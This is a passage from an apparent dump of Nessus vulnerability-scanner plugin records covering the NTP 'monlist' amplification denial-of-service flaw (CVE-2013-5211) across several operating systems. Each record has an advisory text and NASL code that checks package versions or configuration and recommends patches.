Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a security fix.\");\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") 
audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-debuginfo-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-debugsource-4.2.6p5-9.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:27:11", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 1 : ntp (IV56575)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV56575.NASL", "href": "https://www.tenable.com/plugins/nessus/76077", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76077);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 7.1 TL 1 : ntp (IV56575)\");\n script_summary(english:\"Check for APAR IV56575\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP 
allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"01\", sp:\"09\", patch:\"IV56575s9a\", package:\"bos.net.tcp.client\", minfilesetver:\"7.1.1.0\", maxfilesetver:\"7.1.1.20\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:27:36", "description": "Description of changes:\n\n[4.2.6p5-10.0.1.el6_8.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]", "cvss3": {}, "published": "2016-09-13T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : ntp (ELSA-2016-3613)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ntp", "p-cpe:/a:oracle:linux:ntp-doc", "p-cpe:/a:oracle:linux:ntp-perl", "p-cpe:/a:oracle:linux:ntpdate", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2016-3613.NASL", "href": "https://www.tenable.com/plugins/nessus/93449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3613.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93449);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"Oracle Linux 6 : ntp (ELSA-2016-3613)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing 
one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.2.6p5-10.0.1.el6_8.1]\n- add disable monitor to default ntp.conf [CVE-2013-5211]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006329.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntp-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"ntp-4.2.6p5-10.0.1.el6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ntp-doc-4.2.6p5-10.0.1.el6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ntp-perl-4.2.6p5-10.0.1.el6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ntpdate-4.2.6p5-10.0.1.el6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-doc / 
ntp-perl / ntpdate\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:47", "description": "ntp.org reports :\n\nUnrestricted access to the monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013\n\nUse noquery to your default restrictions to block all status queries.\n\nUse disable monitor to disable the ``ntpdc -c monlist'' command while still allowing other status queries.", "cvss3": {}, "published": "2014-01-15T00:00:00", "type": "nessus", "title": "FreeBSD : ntpd DRDoS / Amplification Attack using ntpdc monlist command (3d95c9a7-7d5c-11e3-a8c1-206a8a720317)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ntp", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3D95C9A77D5C11E3A8C1206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/71960", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71960);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n script_xref(name:\"FreeBSD\", value:\"SA-14:02.ntpd\");\n\n script_name(english:\"FreeBSD : ntpd DRDoS / Amplification Attack using ntpdc monlist command (3d95c9a7-7d5c-11e3-a8c1-206a8a720317)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"ntp.org reports :\n\nUnrestricted access to the monlist feature in ntp_request.c in ntpd in\nNTP before 4.2.7p26 
allows remote attackers to cause a denial of\nservice (traffic amplification) via forged (1) REQ_MON_GETLIST or (2)\nREQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013\n\nUse noquery to your default restrictions to block all status queries.\n\nUse disable monitor to disable the ``ntpdc -c monlist'' command while\nstill allowing other status queries.\"\n );\n # http://support.ntp.org/bin/view/Main/SecurityNotice#DRDoS_Amplification_Attack_using\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?58c8d5f5\"\n );\n # https://vuxml.freebsd.org/freebsd/3d95c9a7-7d5c-11e3-a8c1-206a8a720317.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0fa4d7b9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/01/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ntp<4.2.7p26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:16:24", "description": "According to its self-reported version number, the remote Juniper Junos device is affected by a vulnerability in the NTP daemon related to the handling of the 'monlist' command. 
A remote attacker can exploit this by forging a request that results in a distributed denial of service.\n\nNote that this issue only affects devices with NTP client or server enabled.", "cvss3": {}, "published": "2014-09-19T00:00:00", "type": "nessus", "title": "Juniper Junos NTP Server Amplification Remote DoS (JSA10613)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2018-07-12T00:00:00", "cpe": ["cpe:/o:juniper:junos", "cpe:/a:ntp:ntp"], "id": "JUNIPER_JSA10613.NASL", "href": "https://www.tenable.com/plugins/nessus/77756", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77756);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/12\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"EDB-ID\", value:\"33073\");\n script_xref(name:\"ICSA\", value:\"14-051-04\");\n script_xref(name:\"JSA\", value:\"JSA10613\");\n\n script_name(english:\"Juniper Junos NTP Server Amplification Remote DoS (JSA10613)\");\n script_summary(english:\"Checks the Junos version, build date, and configuration.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the remote Juniper\nJunos device is affected by a vulnerability in the NTP daemon related\nto the handling of the 'monlist' command. 
A remote attacker can\nexploit this by forging a request that results in a distributed denial\nof service.\n\nNote that this issue only affects devices with NTP client or server\nenabled.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10613\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant Junos software release or workaround referenced in\nJuniper advisory JSA10613.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:junos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Junos Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"junos_version.nasl\");\n script_require_keys(\"Host/Juniper/JUNOS/Version\", \"Host/Juniper/JUNOS/BuildDate\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"junos_kb_cmd_func.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit('Host/Juniper/JUNOS/Version');\nbuild_date = get_kb_item_or_exit('Host/Juniper/JUNOS/BuildDate');\n\n# Junos OS 14.1R1 release date\nif (compare_build_dates(build_date, '2014-06-07') >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, 'Junos', ver + ' (build date 
' + build_date + ')');\n\nfixes = make_array();\nfixes['11.4'] = '11.4R12';\nfixes['12.1'] = '12.1R10';\nfixes['12.1X44'] = '12.1X44-D35';\nfixes['12.1X45'] = '12.1X45-D25';\nfixes['12.1X46'] = '12.1X46-D15';\nfixes['12.1X47'] = '12.1X47-D10';\nfixes['12.2'] = '12.2R8';\nfixes['12.3'] = '12.3R7';\nfixes['13.1'] = '13.1R4-S2';\nfixes['13.2'] = '13.2R4';\nfixes['13.3'] = '13.3R2';\nfixes['14.1'] = '14.1R1';\n\nfix = check_junos(ver:ver, fixes:fixes, exit_on_fail:TRUE);\n\n# Check for NTP\noverride = TRUE;\nbuf = junos_command_kb_item(cmd:\"show configuration | display set\");\nif (buf)\n{\n pattern = \"^set system ntp server\";\n if (!junos_check_config(buf:buf, pattern:pattern))\n audit(AUDIT_HOST_NOT, 'affected because neither a NTP client nor server are enabled');\n override = FALSE;\n}\n\njunos_report(ver:ver, fix:fix, override:override, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:40", "description": "The remote host is affected by the vulnerability described in GLSA-201401-08 (NTP: Traffic amplification)\n\n ntpd is susceptible to a reflected Denial of Service attack. Please review the CVE identifiers and references below for details.\n Impact :\n\n An unauthenticated remote attacker may conduct a distributed reflective Denial of Service attack on another user via a vulnerable NTP server.\n Workaround :\n\n We modified the default ntp configuration in =net-misc/ntp-4.2.6_p5-r10 and added “noquery” to the default restriction which disallows anyone to query the ntpd status, including “monlist”.\n If you use a non-default configuration, and provide a ntp service to untrusted networks, we highly recommend you to revise your configuration to disable mode 6 and 7 queries for any untrusted (public) network.\n You can always enable these queries for specific trusted networks. 
For more details please see the “Access Control Support” chapter in the ntp.conf(5) man page.", "cvss3": {}, "published": "2014-01-20T00:00:00", "type": "nessus", "title": "GLSA-201401-08 : NTP: Traffic amplification", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:ntp", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201401-08.NASL", "href": "https://www.tenable.com/plugins/nessus/72016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201401-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72016);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"GLSA\", value:\"201401-08\");\n\n script_name(english:\"GLSA-201401-08 : NTP: Traffic amplification\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201401-08\n(NTP: Traffic amplification)\n\n ntpd is susceptible to a reflected Denial of Service attack. 
Please\n review the CVE identifiers and references below for details.\n \nImpact :\n\n An unauthenticated remote attacker may conduct a distributed reflective\n Denial of Service attack on another user via a vulnerable NTP server.\n \nWorkaround :\n\n We modified the default ntp configuration in =net-misc/ntp-4.2.6_p5-r10\n and added “noquery” to the default restriction which disallows anyone\n to query the ntpd status, including “monlist”.\n If you use a non-default configuration, and provide a ntp service to\n untrusted networks, we highly recommend you to revise your configuration\n to disable mode 6 and 7 queries for any untrusted (public) network.\n You can always enable these queries for specific trusted networks. For\n more details please see the “Access Control Support” chapter in the\n ntp.conf(5) man page.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201401-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All NTP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/ntp-4.2.6_p5-r10'\n Note that the updated package contains a modified default configuration\n only. 
You may need to modify your configuration further.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/ntp\", unaffected:make_list(\"ge 4.2.6_p5-r10\"), vulnerable:make_list(\"lt 4.2.6_p5-r10\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"NTP\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": 
"2023-05-18T14:17:44", "description": "The version of ntpd running on the remote host has the 'monlist' command enabled. This command returns a list of recent hosts that have connected to the service. However, it is affected by a denial of service vulnerability in ntp_request.c that allows an unauthenticated, remote attacker to saturate network traffic to a specific IP address by using forged REQ_MON_GETLIST or REQ_MON_GETLIST_1 requests.\nFurthermore, an attacker can exploit this issue to conduct reconnaissance or distributed denial of service (DDoS) attacks.", "cvss3": {}, "published": "2014-01-02T00:00:00", "type": "nessus", "title": "Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2018-07-16T00:00:00", "cpe": ["cpe:/a:ntp:ntp"], "id": "NTP_MONLIST_ENABLED.NASL", "href": "https://www.tenable.com/plugins/nessus/71783", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71783);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/16 14:09:13\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_bugtraq_id(64692);\n script_xref(name:\"CERT\", value:\"348126\");\n script_xref(name:\"EDB-ID\", value:\"33073\");\n script_xref(name:\"ICSA\", value:\"14-051-04\");\n\n script_name(english:\"Network Time Protocol Daemon (ntpd) monlist Command Enabled DoS\");\n script_summary(english:\"Checks if the remote ntpd supports the monlist command.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NTP server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ntpd running on the remote host has the 'monlist'\ncommand enabled. This command returns a list of recent hosts that have\nconnected to the service. 
